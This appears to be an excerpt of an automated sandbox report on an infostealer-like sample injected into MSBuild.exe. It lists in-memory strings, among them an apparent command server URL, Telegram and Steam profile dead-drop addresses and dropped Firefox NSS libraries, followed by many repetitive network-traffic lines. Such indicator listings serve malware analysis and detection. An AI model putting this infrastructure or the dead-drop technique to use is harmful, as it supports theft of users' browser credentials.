Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowe
Source: CFHIIE.5.dr	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: https://mozilla.org0/
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/P
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com/api
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sergei-esenin.com:443/api
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: VmRHSCaiyc.exe, VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107
Source: VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199786602107g0b4cMozilla/5.0
Source: MSBuild.exe, 00000010.00000002.1788373189.0000000001420000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000010.00000002.1787833590.00000000013B2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: HCBAKJ.5.dr	String found in binary or memory: https://support.mozilla.org
Source: HCBAKJ.5.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HCBAKJ.5.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: VmRHSCaiyc.exe, VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/lpnjoke
Source: VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/lpnjokeg0b4cMozilla/5.0
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000103B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000481000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/maslengdsa
Source: VmRHSCaiyc.exe, 00000004.00000002.1448499890.000000000037D000.00000004.00000001.01000000.00000004.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/maslengdsafdmskfj3efskoahttps://steamcommunity.com/profiles/76561199786602107g0b4cMozil
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000103B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/maslengdsax
Source: MSBuild.exe, 00000005.00000002.1774258553.000000000103B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000481000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: MSBuild.exe, 00000005.00000002.1797401893.0000000032271000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1802800143.000000003E153000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1791760562.0000000026397000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1788989987.000000002042F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, nss3[1].dll.5.dr, softokn3.dll.5.dr, softokn3[1].dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.dr, freebl3[1].dll.5.dr, mozglue[1].dll.5.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: GIIEGH.5.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: GIIEGH.5.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: MSBuild.exe, 00000005.00000002.1774258553.00000000011F3000.00000004.00000020.00020000.00000000.sdmp, CFHIIE.5.dr	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org
Source: MSBuild.exe, 00000005.00000002.1778255642.0000000019B2C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/ost.exe
Source: MSBuild.exe, 00000005.00000002.1778255642.0000000019B2C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/xe
Source: MSBuild.exe, 00000005.00000002.1778255642.0000000019B2C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/vchost.exe
Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: MSBuild.exe, 00000005.00000002.1778255642.0000000019B2C000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: MSBuild.exe, 00000005.00000002.1773441370.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/chost.exe
Source: HCBAKJ.5.dr	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49943 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49968
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49966
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49964
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 49966 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49957
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49943
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49896
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49893
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49957 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49880
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49896 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49878
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49876
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49874
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49873
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49870
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49867
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49987
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49906 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49900 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49964 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49930 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
